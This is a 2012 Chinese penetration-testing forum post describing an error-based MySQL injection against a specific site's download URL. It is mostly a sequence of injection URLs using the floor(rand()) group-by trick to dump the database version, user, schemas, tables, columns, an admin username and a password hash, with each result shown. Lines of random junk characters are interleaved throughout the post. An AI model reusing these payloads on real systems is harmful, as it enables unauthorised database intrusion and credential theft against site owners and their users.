中国网络渗透测试联盟
标题:
php+mysql高级爆错注入经测算有效
[打印本页]
作者:
admin
时间:
2012-9-13 17:52
标题:
php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
4 I& N. o% g* c, n3 p7 s1 l
9 d* N" H. Y/ b4 S' o2 x
之前想找个测试 没想到这有 可以测试下做个记录而已
: f5 T6 { Q* ~) \0 M6 z4 t
6 z# K1 y4 O) N6 H1 W
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
[* K8 w7 `$ S: E9 h3 e% f" [
6 w' t+ }8 q9 M t6 M+ y
/data0/htdocs/leqi_new/app/myapp.php
- v' h7 ~0 `- I S
: i8 z) U/ f. T* C2 x% L8 q9 |' T
或者
6 E' y) W6 G- {
0 n$ T5 l1 P5 y. u
/**********version()**********/ 5.1.49-log
8 c: Y% [0 s2 X1 p3 S! q0 {2 l1 q; N
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
# W5 e3 K, w. l5 C% S; l S: o
; U% U+ L9 P7 _& o' ^; _
/**********user()**********/
3 A0 x4 g M4 N' v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: H% O% D; S7 X1 N0 S
2 g4 r5 d8 ]5 F
/**********database()**********/ leqi
( U2 h1 O) K% p3 f" u# G, X% V2 L
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; }* N: D- h1 D( F5 k( o: o3 i
( w! n+ o6 [+ q1 V, ~7 V4 v
/**********limit依次递归爆库**********/
: Q/ V( a1 Q) }: @; E) a
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) S2 U! L$ \) @, r' G& W, h" n
information_schema
; }8 p. K4 x! @& a( k; o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. O6 p0 X3 N) u6 ^
leqi
& r7 d" I( }8 C2 E* O: o9 A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 Z, [0 H/ E6 V
test
6 L" k G' E# \# M9 }
- E) C1 Y3 w( ~8 H6 k# N& `
/**********limit依次递归爆表名**********/
4 r8 v u; L/ t9 V- A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
L# Q$ B7 T3 m+ J+ x
users
) R$ l! C( B0 ]0 W
1 d+ I! [+ x* `/ `4 ]7 O7 Z
/**********limit依次递归爆字段名**********/
: p- c2 S H9 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 e5 @* A# f: w: X' T) E' G
user_id,username,nickname,passwd,group_id
6 ?8 a: Y ~* l: d* ~5 g* h/ T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
, S$ ?- t2 H. {+ T* s/ E+ l R5 x
/wapc/5000_0005_003
1 W. j) o* h; u1 `
11 21
0 C' S& K% B( D4 O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 i6 l3 q1 ^' [; f* C5 S
/wapc/5000_0005_003
7 E9 w0 y; u8 A
11 341 351 361
' j0 F2 L i* N1 b6 Z' l9 X
/**********爆数据**********/
; P; D( O( U6 O9 A$ m6 B, p. P5 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 d0 N4 w. l7 c+ m1 \% b4 X
admin
3 A9 d, f' e/ a: H) }! ?, \/ G" }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
9 z2 K* p% w$ P2 @! O4 B
6a8b4574ca231eb8bd52764d4978ffcd
& P A8 Q( i. u5 ?0 ^
+ W" {. W0 D- H) I$ K, @: v0 B
. S7 e# L9 |. @4 L, _/ H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2